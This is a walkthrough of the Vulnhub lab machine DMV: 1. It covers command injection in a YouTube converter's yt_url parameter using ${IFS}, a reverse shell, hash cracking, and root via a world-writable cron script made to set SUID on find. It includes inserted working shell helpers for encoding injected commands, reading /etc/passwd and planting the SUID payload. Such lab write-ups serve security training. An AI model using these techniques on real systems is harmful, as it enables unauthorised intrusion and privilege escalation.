DMV: 1 Vulnhub Walkthrough

DMV: 1 Vulnhub Walkthrough | DMV: 1 Vulnhub Writeup

Hello friends! Today we are going to take on another boot2root challenge known as DMV: 1. The credit for making this VM goes to Jonathan. It is another boot2root challenge in which our goal is to get root account access.

Description

It is a simple machine that replicates a real scenario that I found. The goal is to get two flags, one that is in the secret folder and the other that can only be read by the root user.

Network Scanning

Let’s start with scanning the network to find our target.


Our next step is to scan our target with an nmap aggressive scan.


The nmap output shows that there are two open ports: 22 (SSH) and 80 (HTTP).

Enumeration

Port 80 is running HTTP, so we open the IP in our browser.

We see a YouTube video-to-audio converter. To test it, I paste in a random YouTube video ID, and after about a minute the audio is converted successfully.

Enumerating and crawling the target website turned up nothing useful.

So we start Burp Suite, capture the request, send it to Repeater and look at what the request looks like.

After some Googling I found an article, Exploit Popular Linux File Managers with a Fake MP4; according to the post, several commands can be executed through the Exec= parameter.

The yt_url parameter does not accept spaces, so in our command we replace every space with the ${IFS} environment variable (the shell's internal field separator, which expands to whitespace and still splits the command into words).

Our command executes, and we can see the first line of the passwd file in the response.
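To make the ${IFS} trick concrete, here is an added example (not code from the original walkthrough): a small helper that rewrites a command with ${IFS} in place of every space, and a local check that the shell still splits the rewritten string into the same words. The helper names and the sample command are assumptions for illustration; the page does not show the exact command it injected.

```sh
#!/bin/sh
# Added example, not from the original DMV: 1 walkthrough.
# Shows why replacing spaces with ${IFS} works when a parameter such as
# yt_url rejects literal whitespace: ${IFS} expands to space, tab and
# newline, which the shell uses as field separators during word splitting.

# Replace every space in a command string with the literal text ${IFS}.
# Output is a string ready to be placed into a parameter that bans spaces.
ifs_encode() {
    printf '%s' "$1" | sed 's/ /${IFS}/g'
}

# Run an IFS-encoded command string in a local shell to confirm that the
# expansion of ${IFS} is split into the original words again.
# (This is the same expansion the injected command undergoes on the target.)
run_encoded() {
    eval "$1"
}

# Assumed sample command (constructed for illustration), shown encoded:
#   head -n1 /etc/passwd  ->  head${IFS}-n1${IFS}/etc/passwd
encoded_example() {
    ifs_encode 'head -n1 /etc/passwd'
}
```

Run `run_encoded "$(ifs_encode 'id')"` in a local shell to see the splitting in action; the encoded string is what goes into the yt_url parameter in Repeater. Note that ${IFS} only stands in for spaces; characters the target filters or URL-encodes differently (quotes, slashes) are a separate concern.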

Python TCP Reverse Shell

Without wasting time, we create shell.sh, a Python reverse shell, start our netcat listener and, using the ( < ) redirection operator, upload our shell to the target machine.

We start our netcat listener.

Then we send the request again through the same parameter.

After the upload the shell executes automatically, and after a few seconds we get a Python reverse shell from the target machine.

Now we run the id command to check our current user and groups.

Enumerating the directory, we find our first flag.txt file along with .htaccess files.

We copy the hash from the .htpasswd file and crack it with john, which gives us the password ( jessie ) for the user itsmeadim.

We try this password against other users but fail to log in as anyone else.

Next we download LinPEAS, the Linux privilege escalation script, to the target system and run it.

It shows a bash script, clean.sh, being executed as root.

We move to the directory of that process, and there we see the bash script clean.sh.

This file is tied to the Delete button of index.php: the script removes the downloads directory after the button is clicked.


Privilege Escalation

Checking the permissions and group of the script, we see that our current user www-data has full permission on it, so we can write to a file that root executes.

Using echo, we overwrite the file with a simple bash script that sets the SUID bit on the find command, replacing its normal permissions.

After 30 seconds we run ls -ls /usr/bin/find and see that the SUID bit has been set on find.


Now we can run commands as the root user: we execute /bin/bash through find and successfully spawn a shell as root.
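The escalation above rests on two checks: is the root-run script writable by our user, and did the SUID bit actually land on find? As an added example (not the walkthrough's own commands), the functions below implement both checks and the overwrite step, and run offline against a constructed directory; the real clean.sh and /usr/bin/find paths are the page's, while WORK, the helper names and the sample files are assumptions for illustration.

```sh
#!/bin/sh
# Added example, not from the original DMV: 1 walkthrough.
# Reproduces the privilege-escalation logic against a constructed directory
# so it can be run without root: find writable scripts, replace one with a
# payload, and verify that the SUID bit appears on the target binary.

# List regular files under a directory that any user can write to (o+w).
# On the real box this is the check that flags clean.sh: a script that root
# runs on a schedule must never be writable by www-data.
world_writable_scripts() {
    find "$1" -type f -perm -002
}

# Overwrite a writable root-run script with a payload that sets the SUID bit
# on the given binary. The script keeps its own path, so the scheduler that
# runs it as root picks up the new contents unchanged.
# Usage: plant_suid_payload /path/to/clean.sh /usr/bin/find
plant_suid_payload() {
    script="$1"
    target="$2"
    printf '#!/bin/bash\nchmod u+s %s\n' "$target" > "$script"
}

# True when the file carries the SUID bit, the same fact ls -ls shows as an
# "s" in the owner execute position.
is_suid() {
    [ -u "$1" ]
}

# Build a constructed stand-in for the target filesystem under WORK (assumed
# path, created here) so the functions can be exercised locally.
make_sample_tree() {
    WORK="$1"
    mkdir -p "$WORK"
    printf '#!/bin/bash\nrm -rf downloads\n' > "$WORK/clean.sh"
    chmod 777 "$WORK/clean.sh"          # the misconfiguration: world-writable
    printf '#!/bin/bash\n' > "$WORK/safe.sh"
    chmod 755 "$WORK/safe.sh"           # a correctly protected script
    : > "$WORK/find"
    chmod 755 "$WORK/find"              # stand-in for /usr/bin/find, no SUID yet
}
```

To run it stand-alone: source the file, call `make_sample_tree /tmp/dmv-demo`, then `world_writable_scripts /tmp/dmv-demo` (only clean.sh is listed), `plant_suid_payload /tmp/dmv-demo/clean.sh /tmp/dmv-demo/find`, execute the script as the scheduler would, and check `is_suid /tmp/dmv-demo/find`. One caveat when using the result: bash drops an effective UID that differs from the real UID unless started with -p, so a SUID find needs to launch the shell as `/bin/bash -p` to keep root privileges.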

We go to the /root directory and find a file called root.txt, our final root flag.
